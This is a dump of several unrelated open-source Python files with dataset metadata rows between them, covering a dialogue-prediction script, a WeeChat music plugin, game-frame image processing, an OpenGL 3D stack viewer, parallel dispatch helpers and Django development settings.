with libAttr.context_disconnected_attrs(affected_attrs, hold_inputs=True, hold_outputs=False):
pymel.makeIdentity(obj, apply=apply, translate=translate, rotate=rotate, scale=scale, **kwargs)
| mit | 3,718,975,997,942,480,400 | 29.17161 | 117 | 0.59118 | false |
microsoft/task_oriented_dialogue_as_dataflow_synthesis | src/dataflow/leaderboard/predict.py | 1 | 2613 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
Semantic Machines\N{TRADE MARK SIGN} software.
Creates the prediction files from onmt_translate output for the leaderboard.
"""
import argparse
from typing import List
import jsons
from more_itertools import chunked
from dataflow.core.dialogue import TurnId
from dataflow.core.io import save_jsonl_file
from dataflow.core.turn_prediction import TurnPrediction
def build_prediction_report_datum(
datum_id_line: str, src_line: str, nbest_lines: List[str],
) -> TurnPrediction:
datum_id = jsons.loads(datum_id_line.strip(), TurnId)
return TurnPrediction(
datum_id=datum_id,
user_utterance=src_line.strip(),
lispress=nbest_lines[0].strip(),
)
def create_onmt_prediction_report(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
):
prediction_report = [
build_prediction_report_datum(
datum_id_line=datum_id_line, src_line=src_line, nbest_lines=nbest_lines,
)
for datum_id_line, src_line, ref_line, nbest_lines in zip(
open(datum_id_jsonl),
open(src_txt),
open(ref_txt),
chunked(open(nbest_txt), nbest),
)
]
save_jsonl_file(prediction_report, "predictions.jsonl")
def main(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
) -> None:
"""Creates 1-best predictions and saves them to files."""
create_onmt_prediction_report(
datum_id_jsonl=datum_id_jsonl,
src_txt=src_txt,
ref_txt=ref_txt,
nbest_txt=nbest_txt,
nbest=nbest,
)
def add_arguments(argument_parser: argparse.ArgumentParser) -> None:
argument_parser.add_argument("--datum_id_jsonl", help="datum ID file")
argument_parser.add_argument("--src_txt", help="source sequence file")
argument_parser.add_argument("--ref_txt", help="target sequence reference file")
argument_parser.add_argument("--nbest_txt", help="onmt_translate output file")
argument_parser.add_argument("--nbest", type=int, help="number of hypos per datum")
if __name__ == "__main__":
cmdline_parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawTextHelpFormatter
)
add_arguments(cmdline_parser)
args = cmdline_parser.parse_args()
print("Semantic Machines\N{TRADE MARK SIGN} software.")
main(
datum_id_jsonl=args.datum_id_jsonl,
src_txt=args.src_txt,
ref_txt=args.ref_txt,
nbest_txt=args.nbest_txt,
nbest=args.nbest,
)
| mit | -9,164,045,024,337,558,000 | 30.865854 | 87 | 0.66284 | false |
nashgul/weechat | audacious_script/audacious.py | 1 | 3067 | # audacious now playing for weechat
# nashgul <[email protected]>
# version 0.1
# white => "00", black => "01", darkblue => "02", darkgreen => "03", lightred => "04", darkred => "05", magenta => "06", orange => "07", yellow => "08", lightgreen => "09", cyan => "10", lightcyan => "11", lightblue => "12", lightmagenta => "13", gray => "14", lightgray => "15"
import weechat
import subprocess
weechat.register("audacious_np", "nashgul", "0.01", "GPL2", "now playing for audacious (usage: /audacious)", "", "")
name = 'audacious'
description = 'show now playing for audacious'
hook = weechat.hook_command(name, description, '', '', '', 'now_playing', '')
def get_info_array():
info_list = (['audtool current-song',
'audtool current-song-length',
'audtool current-song-output-length',
'audtool current-song-bitrate-kbps',
'audtool current-song-filename'])
results = []
for x in info_list:
temporal = subprocess.Popen(x, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
b = temporal.stdout.read().splitlines()
results.append(b[0])
return results
def now_playing(datos, channel, args):
colors = {
'white' : '00', 'black' : '01', 'darkblue' : '02', 'darkgreen' : '03',
'lightred' : '04', 'darkred' : '05', 'magenta' : '06', 'orange' : '07',
'yellow' : '08', 'lightgreen' : '09', 'cyan' : '10', 'lightcyan' : '11',
'lightblue' : '12', 'lightmagenta' : '13', 'gray' : '14', 'lightgray' : '15'
}
info_array = get_info_array()
message_color = "%s" % colors['darkblue']
message = u'\x03' + message_color + 'esta reproduciendo' + u'\x0f'
song_color = "%s" % colors['lightred']
song = u'\x03' + song_color + info_array[0] + u'\x0f'
song_filename_color = "%s" % colors['lightred']
song_filename = u'\x03' + song_filename_color + info_array[4] + u'\x0f'
brackets_color = "%s" % colors['yellow']
bracket_1 = u'\x03' + brackets_color + '[' + u'\x0f'
bracket_2 = u'\x03' + brackets_color + ']' + u'\x0f'
hyphen_color = "%s" % colors['yellow']
hyphen = u'\x03' + hyphen_color + ' - ' + u'\x0f'
at_color = "%s" % colors['yellow']
at_sym = u'\x03' + at_color + '@' + u'\x0f'
output_length_color = "%s" % colors['lightblue']
output_length = u'\x03' + output_length_color + info_array[2] + u'\x0f'
length = ''
if info_array[1] != '0:00':
length_color = "%s" % colors['lightblue']
length = u'\x03' + length_color + hyphen + ' ' + info_array[1] + ' ' + u'\x0f'
bitrate_color = "%s" % colors['lightmagenta']
bitrate = u'\x03' + bitrate_color + info_array[3] + ' kbps' + u'\x0f'
string = "%s %s %s%s %s %s" %(bracket_1, output_length, length, at_sym, bitrate, bracket_2)
source = ''
if song_filename.lower().startswith('http'):
source = song_filename
output_string = "%s: %s %s %s" %(message, source, song, string)
weechat.command(channel, "/me %s" % (output_string))
return weechat.WEECHAT_RC_OK
| gpl-2.0 | -6,693,482,823,102,077,000 | 45.469697 | 278 | 0.573525 | false |
SerpentAI/SerpentAI | serpent/game_frame.py | 1 | 5346 | import skimage.color
import skimage.measure
import skimage.transform
import skimage.filters
import skimage.morphology
import numpy as np
import io
from PIL import Image
class GameFrameError(BaseException):
pass
class GameFrame:
def __init__(self, frame_data, frame_variants=None, timestamp=None, **kwargs):
if isinstance(frame_data, bytes):
self.frame_bytes = frame_data
self.frame_array = None
elif isinstance(frame_data, np.ndarray):
self.frame_bytes = None
self.frame_array = frame_data
self.frame_variants = frame_variants or dict()
self.timestamp = timestamp
self.offset_x = kwargs.get("offset_x") or 0
self.offset_y = kwargs.get("offset_y") or 0
self.resize_order = kwargs.get("resize_order") or 1
@property
def frame(self):
return self.frame_array if self.frame_array is not None else self.frame_bytes
@property
def half_resolution_frame(self):
""" A quarter-sized version of the frame (half-width, half-height)"""
if "half" not in self.frame_variants:
self.frame_variants["half"] = self._to_half_resolution()
return self.frame_variants["half"]
@property
def quarter_resolution_frame(self):
""" A sixteenth-sized version of the frame (quarter-width, quarter-height)"""
if "quarter" not in self.frame_variants:
self.frame_variants["quarter"] = self._to_quarter_resolution()
return self.frame_variants["quarter"]
@property
def eighth_resolution_frame(self):
""" A 1/32-sized version of the frame (eighth-width, eighth-height)"""
if "eighth" not in self.frame_variants:
self.frame_variants["eighth"] = self._to_eighth_resolution()
return self.frame_variants["eighth"]
@property
def eighth_resolution_grayscale_frame(self):
""" A 1/32-sized, grayscale version of the frame (eighth-width, eighth-height)"""
if "eighth_grayscale" not in self.frame_variants:
self.frame_variants["eighth_grayscale"] = self._to_eighth_grayscale_resolution()
return self.frame_variants["eighth_grayscale"]
@property
def grayscale_frame(self):
""" A full-size grayscale version of the frame"""
if "grayscale" not in self.frame_variants:
self.frame_variants["grayscale"] = self._to_grayscale()
return self.frame_variants["grayscale"]
@property
def ssim_frame(self):
""" A 100x100 grayscale frame to be used for SSIM"""
if "ssim" not in self.frame_variants:
self.frame_variants["ssim"] = self._to_ssim()
return self.frame_variants["ssim"]
@property
def top_color(self):
height, width, channels = self.eighth_resolution_frame.shape
values, counts = np.unique(self.eighth_resolution_frame.reshape(width * height, channels), axis=0, return_counts=True)
return [int(i) for i in values[np.argsort(counts)[::-1][0]]]
def compare_ssim(self, previous_game_frame):
return skimage.measure.compare_ssim(previous_game_frame.ssim_frame, self.ssim_frame)
def difference(self, previous_game_frame):
current = skimage.filters.gaussian(self.grayscale_frame, 8)
previous = skimage.filters.gaussian(previous_game_frame.grayscale_frame, 8)
return current - previous
def to_pil(self):
return Image.fromarray(self.frame)
def to_png_bytes(self):
pil_frame = Image.fromarray(skimage.util.img_as_ubyte(self.frame))
if len(self.frame.shape) == 3:
pil_frame = pil_frame.convert("RGB")
png_frame = io.BytesIO()
pil_frame.save(png_frame, format="PNG", compress_level=3)
png_frame.seek(0)
return png_frame.read()
# TODO: Refactor Fraction of Resolution Frames...
def _to_half_resolution(self):
shape = (
self.frame_array.shape[0] // 2,
self.frame_array.shape[1] // 2
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_quarter_resolution(self):
shape = (
self.frame_array.shape[0] // 4,
self.frame_array.shape[1] // 4
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_grayscale_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.grayscale_frame, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_grayscale(self):
return np.array(skimage.color.rgb2gray(self.frame_array) * 255, dtype="uint8")
def _to_ssim(self):
grayscale = self.grayscale_frame
return skimage.transform.resize(grayscale, (100, 100), mode="reflect", order=0)
| mit | -799,488,949,246,343,400 | 31.204819 | 140 | 0.633558 | false |
tonnrueter/pymca_devel | PyMca/Object3D/Object3DPlugins/Object3DStack.py | 1 | 24743 | import os
try:
import OpenGL.GL as GL
import OpenGL.GLU as GLU
except ImportError:
raise ImportError, "OpenGL must be installed to use these functionalities"
import numpy
try:
from PyMca import spslut
except:
import spslut
try:
from PyMca.Object3D import Object3DFileDialogs
from PyMca.Object3D import Object3DBase
except ImportError:
from Object3D import Object3DFileDialogs
from Object3D import Object3DBase
try:
from PyMca.Object3D import Object3DCTools
except ImportError:
try:
from Object3D import Object3DCTools
except:
import Object3DCTools
import Object3DMeshConfig
qt = Object3DMeshConfig.qt
import weakref
#import buffers
DEBUG = 0
import time
DRAW_MODES = ['NONE',
'POINT',
'WIRE',
'SURFACE',
'LIGHT',
'POINT_SELECTION']
COLORMAPLIST = [spslut.GREYSCALE, spslut.REVERSEGREY, spslut.TEMP,
spslut.RED, spslut.GREEN, spslut.BLUE, spslut.MANY]
class Object3DStack(Object3DBase.Object3D):
def __init__(self, name = "3D-Array"):
Object3DBase.Object3D.__init__(self, name)
self._alpha = 255
self.drawListDict = {}
self._forceListCalculation = {}
self.vertices = None
self.vertexColors = None
self.vertexSelectionColors = None
self._selected = False
self._vertexSelectionMode = False
self.drawMode = 'POINT'
self.__isosurfacesDict = {}
for i in range(5):
self.__isosurfacesDict[i] = {}
self.__isosurfacesDict[i]['list'] = 0
self.__isosurfacesDict[i]['value'] = 0
self.__isosurfacesDict[i]['color'] = 'red'
self.__isosurfacesDict[i]['r'] = 0xFF
self.__isosurfacesDict[i]['g'] = 0
self.__isosurfacesDict[i]['b'] = 0
self.__isosurfacesDict[i]['a'] = 0xFF
self._configuration['common']['supportedmodes'] = [1, 1, 1, 1]
self._configuration['common']['mode'] = 1
#centered on XY plane and on Z
self._configuration['common']['anchor'] = [2, 2, 2]
#self._verticesBufferObject = None
#self._vertexColorBufferObject = None
#self._vertexSelectionColorBufferObject = None
def initPrivateConfiguration(self, name):
"""
Specific configuration
"""
self._configuration['private'] = {}
if self._privateConfigurationWidget is None:
self._privateConfigurationWidget = Object3DMeshConfig.\
Object3DMeshConfig(None, name)
self._configuration['private']['widget'] = weakref.proxy(self._privateConfigurationWidget)
self._configuration['private']['colorfilter'] = 1
self._configuration['private']['isosurfaces'] = [[1, 20, 'green', 0, 0xFF, 0, 0xFF]] #green
#self._configuration['private']['isosurfaces'] = [[1, 10, None, 0, 0, 0, 0xFF]] #auto
self._configuration['private']['useminmax'] = [0, 100, 200]
self._configuration['private']['infolabel'] = "Object3DStack %s" % name
def __del__(self):
for key in self.drawListDict.keys():
if key.upper() != "NONE":
if self.drawListDict[key] > 0:
GL.glDeleteLists(self.drawListDict[key], 1)
for key in self.__isosurfacesDict.keys():
if self.__isosurfacesDict[key]['list'] > 0:
GL.glDeleteLists(self.__isosurfacesDict[key]['list'], 1)
try:
Object3DBase.Object3D.__del__(self)
except AttributeError:
pass
def setConfiguration(self, ddict):
old_alpha = 1.0 - self._configuration['common']['transparency']
Object3DBase.Object3D.setConfiguration(self, ddict)
new_alpha = 1.0 - self._configuration['common']['transparency']
if (new_alpha != old_alpha):
self._setAlpha(new_alpha)
self.drawMode = DRAW_MODES[self._configuration['common']['mode']]
if ddict['common'].has_key('event'):
if ddict['common']['event'] == 'ColormapChanged':
self.getColors()
def _setAlpha(self, alpha):
if alpha < 0:
alpha = 0
elif alpha >= 1.0:
alpha = 255
else:
self._alpha = int(255 * alpha)
if self.vertexColors is None:
return
self.vertexColors[:, 3] = self._alpha
def setData(self, *args, **kw):
return self.setStack(*args, **kw)
def setStack(self, data, x=None, y=None, z=None, xyz=None):
"""
setStack(data, data, xyz=None)
data is the array of vertex values.
xyz = [x,y,z] are three arrays with the grid coordinates
"""
if hasattr(data, "info") and hasattr(data, "data"):
#It is an actual stack
self._actualStack = True
self.values = data.data[:]
else:
self._actualStack = False
self.values = data[:]
if self.values.dtype != numpy.float32:
print("WARNING: Converting to float32")
self.values = self.values.astype(numpy.float32)
if (x is None) and (y is None) and (xyz is None):
xsize, ysize, zsize = self.values.shape
self._x = numpy.arange(xsize).astype(numpy.float32)
self._y = numpy.arange(ysize).astype(numpy.float32)
self._z = numpy.arange(zsize).astype(numpy.float32)
if self._actualStack:
xCal = map(float, eval(data.info.get('CAxis0CalibrationParameters', '[0., 1.0, 0.0]')))
yCal = map(float, eval(data.info.get('CAxis1CalibrationParameters', '[0., 1.0, 0.0]')))
zCal = map(float, eval(data.info.get('CAxis2CalibrationParameters', '[0., 1.0, 0.0]')))
self._x[:] = xCal[0] + self._x * (xCal[1] + xCal[2] * self._x)
self._y[:] = yCal[0] + self._y * (yCal[1] + yCal[2] * self._y)
self._z[:] = zCal[0] + self._z * (zCal[1] + zCal[2] * self._z)
self.xSize, self.ySize, self.zSize = xsize, ysize, zsize
elif xyz is not None:
self.xSize, self.ySize, self.zSize = self.values.shape
self._x[:] = xyz[0][:]
self._y[:] = xyz[1][:]
self._z[:] = xyz[2][:]
elif (x is not None) and (y is not None):
#regular mesh
self._x = numpy.array(x).astype(numpy.float32)
self._y = numpy.array(y).astype(numpy.float32)
self._x.shape = -1, 1
self._y.shape = -1, 1
self.xSize = self._x.shape[0]
self.ySize = self._y.shape[0]
if z is not None:
self._z = numpy.array(z).astype(numpy.float32)
if len(self._z.shape) == 0:
#assume just a number
self.zSize = 1
else:
self._z.shape = -1, 1
self.zSize = self._z.shape[0]
else:
a=1
for v in self.values.shape:
a *= v
zsize = int(a/(self.xSize * self.ySize))
self._z = numpy.arange(zsize).astype(numpy.float32)
self.zSize = zsize
else:
raise ValueError, "Unhandled case"
old_shape = self.values.shape
self.nVertices = self.xSize * self.ySize * self.zSize
self.values.shape = self.nVertices, 1
self.getColors()
self._obtainLimits()
#restore original shape
self.values.shape = old_shape
def getColors(self):
old_shape = self.values.shape
self.values.shape = -1, 1
self._configuration['common']['colormap'][4]=self.values.min()
self._configuration['common']['colormap'][5]=self.values.max()
colormap = self._configuration['common']['colormap']
(self.vertexColors,size,minmax)= spslut.transform(self.values,
(1,0),
(colormap[6],3.0),
"RGBX",
COLORMAPLIST[int(str(colormap[0]))],
colormap[1],
(colormap[2], colormap[3]),
(0, 255),1)
self.values.shape = old_shape
self.vertexColors.shape = self.nVertices, 4
self.vertexColors[:, 3] = self._alpha
#selection colors
# if I have more than pow(2, 24) vertices
# the vertex with number pow(2, 24) will never be selected
return
i = numpy.arange(self.nVertices)
self.vertexSelectionColors = numpy.zeros((self.nVertices,4),
numpy.uint8)
self.vertexSelectionColors[:,0] = (i & 255)
self.vertexSelectionColors[:,1] = ((i >> 8) & 255)
self.vertexSelectionColors[:,2] = ((i >> 16) & 255)
self.vertexSelectionColors[:,3] = 255 - (i >> 24)
def _obtainLimits(self):
xmin, ymin, zmin = self._x.min(), self._y.min(), self._z.min()
xmax, ymax, zmax = self._x.max(), self._y.max(), self._z.max()
self.setLimits(xmin, ymin, zmin, xmax, ymax, zmax)
def drawObject(self):
if self.values is None:
return
if DEBUG:
t0=time.time()
GL.glPushAttrib(GL.GL_ALL_ATTRIB_BITS)
GL.glShadeModel(GL.GL_FLAT)
if self.drawMode == 'NONE':
pass
elif (GL.glGetIntegerv(GL.GL_RENDER_MODE) == GL.GL_SELECT) or \
self._vertexSelectionMode:
self.buildPointList(selection=True)
elif self.drawMode == 'POINT':
self.buildPointList(selection=False)
#self.buildPointListNEW(selection=False)
elif self.drawMode == 'POINT_SELECTION':
self.buildPointList(selection=True)
elif self.drawMode in ['LINES', 'WIRE']:
Object3DCTools.draw3DGridLines(self._x,
self._y,
self._z,
self.vertexColors,
self.values,
self._configuration['private']['colorfilter'],
self._configuration['private']['useminmax'])
elif self.drawMode == "SURFACE":
flag = 1
i = 0
for use, value, label, cr, cg, cb, ca in self._configuration['private']['isosurfaces']:
color = (cr, cg, cb, ca)
if None in color:
color = None
if use:
flag = 0
GL.glEnable(GL.GL_LIGHTING)
if color is not None:
GL.glColor4ub(color[0],
color[1],
color[2],
self._alpha)
colorflag = False
if self.__isosurfacesDict[i]['list'] > 0:
if self.__isosurfacesDict[i]['color'] == color:
colorflag = True
elif (self.__isosurfacesDict[i]['color'] != None) and\
(color != None):
colorflag = True
if self.__isosurfacesDict[i]['list'] > 0:
if (self.__isosurfacesDict[i]['value'] == value) and\
colorflag:
GL.glCallList(self.__isosurfacesDict[i]['list'])
i += 1
continue
GL.glDeleteLists(self.__isosurfacesDict[i]['list'],
1)
self.__isosurfacesDict[i]['value']= value
self.__isosurfacesDict[i]['color']= color
self.__isosurfacesDict[i]['list'] = GL.glGenLists(1)
GL.glNewList(self.__isosurfacesDict[i]['list'],
GL.GL_COMPILE)
GL.glBegin(GL.GL_TRIANGLES)
Object3DCTools.gridMarchingCubes(self._x, self._y, self._z, self.values, value, color, (1, 1, 1), 1)
#Object3DCTools.gridMarchingCubes(self._x, self._y, self._z, self.values, value, None, (1, 1, 1), 1)
GL.glEnd()
GL.glEndList()
GL.glCallList(self.__isosurfacesDict[i]['list'])
GL.glDisable(GL.GL_LIGHTING)
i += 1
if flag:
#This is useless, only isosurfaces makes sense
Object3DCTools.draw3DGridQuads(self._x,
self._y,
self._z,
self.vertexColors,
self.values,
self._configuration['private']['colorfilter'],
self._configuration['private']['useminmax'])
else:
print "UNSUPPORTED MODE"
GL.glPopAttrib()
if DEBUG:
print "Drawing takes ", time.time() - t0
def _getVertexSelectionColors(self):
self.vertexSelectionColors = numpy.zeros((self.nVertices,4),
numpy.uint8)
#split the color generation in two blocks
#to reduce the amount of memory needed
half = int(self.nVertices/2)
i = numpy.arange(0, half)
self.vertexSelectionColors[:half,0] = (i & 255)
self.vertexSelectionColors[:half,1] = ((i >> 8) & 255)
self.vertexSelectionColors[:half,2] = ((i >> 16) & 255)
self.vertexSelectionColors[:half,3] = 255 - (i >> 24)
i = numpy.arange(half, self.nVertices)
self.vertexSelectionColors[half:,0] = (i & 255)
self.vertexSelectionColors[half:,1] = ((i >> 8) & 255)
self.vertexSelectionColors[half:,2] = ((i >> 16) & 255)
self.vertexSelectionColors[half:,3] = 255 - (i >> 24)
def isVertexSelectionModeSupported(self):
return True
def buildPointList(self, selection=False):
if selection:
if self.vertexSelectionColors is None:
self._getVertexSelectionColors()
if self._configuration['private']['colorfilter']:
tinyNumber = 1.0e-10
minValue = self._configuration['common']['colormap'][2] + tinyNumber
maxValue = self._configuration['common']['colormap'][3] - tinyNumber
Object3DCTools.draw3DGridPoints(self._x,
self._y,
self._z,
self.vertexSelectionColors,
self.values,
0,
[1, minValue, maxValue])
else:
Object3DCTools.draw3DGridPoints(self._x,
self._y,
self._z,
self.vertexSelectionColors,
self.values,
0,
self._configuration['private']['useminmax'])
else:
Object3DCTools.draw3DGridPoints(self._x,
self._y,
self._z,
self.vertexColors,
self.values,
self._configuration['private']['colorfilter'],
self._configuration['private']['useminmax'])
def buildWireList(self):
Object3DCTools.draw3DGridLines(self._x,
self._y,
self._z,
self.vertexColors)
def __fillVerticesBufferObject(self):
if self.vertices is None:
self.vertices = Object3DCTools.get3DGridFromXYZ(self._x,
self._y,
self._z)
self.indices = numpy.arange(self.nVertices)
self._verticesBufferObject = buffers.VertexBuffer(self.vertices,
GL.GL_STATIC_DRAW)
self.vertices = None
print "self._vertexBufferObject = ", self._verticesBufferObject
def __fillVertexColorsBufferObject(self):
if self.vertexColors is None:
if self.vertexSelectionColors is None:
i = numpy.arange(self.nVertices)
self.vertexSelectionColors = numpy.zeros((self.nVertices,4),
numpy.uint8)
self.vertexSelectionColors[:,0] = (i & 255)
self.vertexSelectionColors[:,1] = ((i >> 8) & 255)
self.vertexSelectionColors[:,2] = ((i >> 16) & 255)
self.vertexSelectionColors[:,3] = 255 - (i >> 24)
self._vertexColorsBufferObject = buffers.VertexBuffer(self.vertexSelectionColors,
GL.GL_STATIC_DRAW)
print "self._vertexColorsBufferObject = ", self._vertexColorsBufferObject
def buildPointListNEW(self, selection=False):
if self._verticesBufferObject is None:
self.__fillVerticesBufferObject()
if self._vertexColorsBufferObject is None:
self.__fillVertexColorsBufferObject()
#self._vertexSelectionColorBufferObject = None
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
GL.glEnableClientState(GL.GL_COLOR_ARRAY)
self._verticesBufferObject.bind()
self._vertexColorsBufferObject.bind()
GL.glDrawElements(GL.GL_POINTS, self.indices)
GL.glDisableClientState(GL.GL_VERTEX_ARRAY)
GL.glDisableClientState(GL.GL_COLOR_ARRAY)
def buildPointListOLD(self):
if self.vertices is None:
self.vertices = Object3DCTools.get3DGridFromXYZ(self._x,
self._y,
self._z)
GL.glVertexPointerf(self.vertices)
GL.glColorPointerub(self.vertexColors)
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
GL.glEnableClientState(GL.GL_COLOR_ARRAY)
GL.glDrawArrays(GL.GL_POINTS, 0, self.nVertices)
def buildPointList0(self):
"""
This is just to test memory and speed
"""
n1, n2, n3 = 256, 256, 256
print "OLD TOTAL = ",71 * 80 * 2000
print "TOTAL = ", 256 * 256 * 256
zdata = numpy.arange(n1*n2*n3).astype(numpy.float32)
zdata.shape= -1, 1
print zdata.shape
(image,size,minmax)= spslut.transform(zdata,
(1,0),
(spslut.LINEAR,3.0),
"RGBX",
spslut.TEMP,
1,
(0, 1),
(0, 255),1)
image.shape = -1, 4
image[:,3] = 255
#self.vertexColors = image.astype(numpy.float32)
x = numpy.arange(n1).astype(numpy.float32)
y = numpy.arange(n2).astype(numpy.float32)
z = numpy.arange(n3).astype(numpy.float32)
#Object3DCTools.draw3DGridQuads(x, y, y)
#Object3DCTools.draw3DGridLines(x, y, z, image)
Object3DCTools.draw3DGridPoints(x, y, z, image)
self.zdata = zdata
def getIndexValues(self, index):
"""
x,y,z, I
"""
xindex = int(index/(self.ySize*self.zSize))
yindex = int((index % (self.ySize*self.zSize))/self.zSize)
zindex = index % self.zSize
#print "index = ", index, "xindex = ", xindex, "yindex = ", yindex, "zindex = ", zindex
if len(self.values.shape) == 3:
value = self.values[xindex, yindex, zindex]
else:
value = self.values[index]
return self._x[xindex], self._y[yindex], self._z[zindex], value
MENU_TEXT = '4D Stack'
def getObject3DInstance(config=None):
#for the time being a former configuration
#for serializing purposes is not implemented
#I do the import here for the case PyMca is not installed
#because the modules could be instanstiated without using
#this method
try:
from PyMca import EDFStack
from PyMca import TiffStack
except ImportError:
import EDFStack
import TiffStack
fileTypeList = ['EDF Z Stack (*edf *ccd)',
'EDF X Stack (*edf *ccd)',
'TIFF Stack (*tif *tiff)']
old = Object3DFileDialogs.Object3DDirs.nativeFileDialogs * 1
Object3DFileDialogs.Object3DDirs.nativeFileDialogs = False
fileList, filterUsed = Object3DFileDialogs.getFileList(None, fileTypeList,
"Please select the object file(s)",
"OPEN",
True)
Object3DFileDialogs.Object3DDirs.nativeFileDialogs = old
if not len(fileList):
return None
if filterUsed == fileTypeList[0]:
fileindex = 2
else:
fileindex = 1
#file index is irrelevant in case of an actual 3D stack.
filename = fileList[0]
legend = os.path.basename(filename)
if filterUsed == fileTypeList[2]:
#TIFF
stack = TiffStack.TiffStack(dtype=numpy.float32, imagestack=False)
stack.loadFileList(fileList, fileindex=1)
elif len(fileList) == 1:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
stack.loadIndexedStack(filename, fileindex=fileindex)
else:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
stack.loadFileList(fileList, fileindex=fileindex)
if stack is None:
raise IOError("Problem reading stack.")
object3D = Object3DStack(name=legend)
object3D.setStack(stack)
return object3D
if __name__ == "__main__":
import sys
from Object3D import SceneGLWindow
import os
try:
from PyMca import EDFStack
from PyMca import EdfFile
except ImportError:
import EDFStack
import EdfFile
import getopt
options = ''
longoptions = ["fileindex=","begin=", "end="]
try:
opts, args = getopt.getopt(
sys.argv[1:],
options,
longoptions)
except getopt.error,msg:
print msg
sys.exit(1)
fileindex = 2
begin = None
end = None
for opt, arg in opts:
if opt in '--begin':
begin = int(arg)
elif opt in '--end':
end = int(arg)
elif opt in '--fileindex':
fileindex = int(arg)
app = qt.QApplication(sys.argv)
window = SceneGLWindow.SceneGLWindow()
window.show()
if len(sys.argv) == 1:
object3D = getObject3DInstance()
if object3D is not None:
window.addObject(object3D)
else:
if len(sys.argv) > 1:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
filename = args[0]
else:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
filename = "..\COTTE\ch09\ch09__mca_0005_0000_0070.edf"
if os.path.exists(filename):
print "fileindex = ", fileindex
stack.loadIndexedStack(filename, begin=begin, end=end, fileindex=fileindex)
object3D = Object3DStack()
object3D.setStack(stack)
stack = 0
else:
print "filename %s does not exists" % filename
sys.exit(1)
time.sleep(1)
print "START ADDING"
window.addObject(object3D, "STACK")
window.setSelectedObject("STACK")
print "END ADDING"
window.glWidget.setZoomFactor(1.0)
window.show()
app.exec_()
| gpl-2.0 | -4,443,805,194,613,521,000 | 40.937288 | 120 | 0.508225 | false |
agraubert/agutil | agutil/parallel/src/dispatcher.py | 1 | 2555 | from .exceptions import _ParallelBackgroundException
from .worker import ThreadWorker, ProcessWorker
from itertools import zip_longest
WORKERTYPE_THREAD = ThreadWorker
WORKERTYPE_PROCESS = ProcessWorker
class IterDispatcher:
def __init__(
self,
func,
*args,
maximum=15,
workertype=WORKERTYPE_THREAD,
**kwargs
):
self.func = func
self.maximum = maximum
self.args = [iter(arg) for arg in args]
self.kwargs = {key: iter(v) for (key, v) in kwargs.items()}
self.worker = workertype
def run(self):
yield from self.dispatch()
def dispatch(self):
self.worker = self.worker(self.maximum)
try:
output = []
for args, kwargs in self._iterargs():
# _args = args if args is not None else []
# _kwargs = kwargs if kwargs is not None else {}
output.append(self.worker.work(
self.func,
*args,
**kwargs
))
for callback in output:
result = callback()
if isinstance(result, _ParallelBackgroundException):
raise result.exc
yield result
finally:
self.worker.close()
def _iterargs(self):
while True:
args = []
had_arg = False
for src in self.args:
try:
args.append(next(src))
had_arg = True
except StopIteration:
return # args.append(None)
kwargs = {}
for key, src in self.kwargs.items():
try:
kwargs[key] = next(src)
had_arg = True
except StopIteration:
return # kwargs[key] = None
if not had_arg:
return
yield args, kwargs
def __iter__(self):
yield from self.dispatch()
def is_alive(self):
return self.worker.is_alive()
class DemandDispatcher:
def __init__(self, func, maximum=15, workertype=WORKERTYPE_THREAD):
self.maximum = maximum
self.func = func
self.worker = workertype(self.maximum)
def dispatch(self, *args, **kwargs):
try:
return self.worker.work(self.func, *args, **kwargs)
except BaseException:
self.worker.close()
raise
def close(self):
self.worker.close()
| mit | 1,826,956,604,685,546,800 | 27.707865 | 71 | 0.508415 | false |
juliancantillo/royal-films | config/settings/local.py | 1 | 1950 | # -*- coding: utf-8 -*-
'''
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env("DJANGO_SECRET_KEY", default='t3kohnptyzfb7v@s@4dlm2o1356rz&^oamd-y34qat^^69b+s(')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
default='django.core.mail.backends.console.EmailBackend')
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ('127.0.0.1', '10.0.2.2',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
